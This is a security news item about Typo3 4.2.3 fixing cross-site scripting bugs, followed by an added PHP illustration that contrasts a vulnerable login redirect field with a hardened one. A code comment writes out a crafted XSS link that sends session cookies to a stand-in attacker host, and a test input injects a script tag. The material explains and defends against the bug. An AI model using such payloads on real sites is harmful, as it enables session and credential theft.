Security update for Typo3
Version 4.2.3 of the Typo3 content management system fixes two cross-site scripting vulnerabilities that allow an attacker to inject and execute JavaScript in a victim's browser. An attacker would normally exploit such a bug to steal access data such as session cookies or login credentials. The bugs are located in the felogin system extension and in the file backend module.

The felogin vulnerability can be exploited simply by tricking a user into following a specially crafted link. The developers say, however, that the bug in file can only be exploited if the target is a backend user or if the attacker knows the server's web folder structure. Versions 4.2.x are affected. Users of the felogin extension in particular should update their systems as soon as possible. Earlier this week, a collective security bulletin was issued describing vulnerabilities in a number of Typo3 third-party extensions.
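The article does not say which parameter in felogin is affected, so the following is a generic illustration added here of the bug class it describes (reflected cross-site scripting triggered by a crafted link), not the actual TYPO3 or felogin code. The parameter name redirect_url, both functions and the sample input are assumptions; the example shows the unescaped output beside a hardened version that encodes for the HTML attribute context and limits the value to a local path.

```php
<?php
// Hypothetical reflected XSS (assumed names, not the felogin code): a login
// form that echoes the "redirect_url" request parameter back into the page
// without escaping it.
function renderRedirectFieldVulnerable(array $get): string
{
    $url = $get['redirect_url'] ?? '';
    // Raw interpolation: a crafted link such as
    //   ?redirect_url="><script>document.location='https://attacker.example/?c='+document.cookie</script>
    // closes the value attribute and runs attacker JavaScript in the
    // victim's session as soon as the victim opens the link.
    return '<input type="hidden" name="redirect_url" value="' . $url . '">';
}

// Hardened version: encode for the HTML attribute context and, because the
// value is later used as a redirect target, accept only same-site paths.
function renderRedirectFieldSafe(array $get): string
{
    $url = $get['redirect_url'] ?? '';
    // Allow a single leading slash followed by non-whitespace; this rejects
    // "javascript:" URLs, external hosts and protocol-relative "//host" forms.
    if (!preg_match('#^/(?![/\\\\])\S*$#', $url)) {
        $url = '/';
    }
    // ENT_QUOTES escapes both quote characters, which is what an attribute
    // context needs; always name the charset explicitly.
    $escaped = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="redirect_url" value="' . $escaped . '">';
}

// Constructed input that mimics the query string of a crafted link.
$crafted = ['redirect_url' => '"><script>alert(document.cookie)</script>'];
echo renderRedirectFieldVulnerable($crafted), "\n"; // attacker script lands in the page
echo renderRedirectFieldSafe($crafted), "\n";       // value replaced by "/", nothing to execute

// A legitimate relative redirect survives the check and is encoded harmlessly.
$legit = ['redirect_url' => '/members/profile?tab=a&b=c'];
echo renderRedirectFieldSafe($legit), "\n";
```

Output encoding at the point where untrusted data is written into HTML is the fix that closes the injection; the path whitelist is a separate defence against the same parameter being abused as an open redirect once the XSS is gone.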
See also
- Cross-Site Scripting vulnerability in TYPO3 Core (1), security advisory at typo3.org
- Cross-Site Scripting vulnerability in TYPO3 Core (2), security advisory at typo3.org
- Several vulnerabilities in third party extensions, security advisory at typo3.org
(djwm)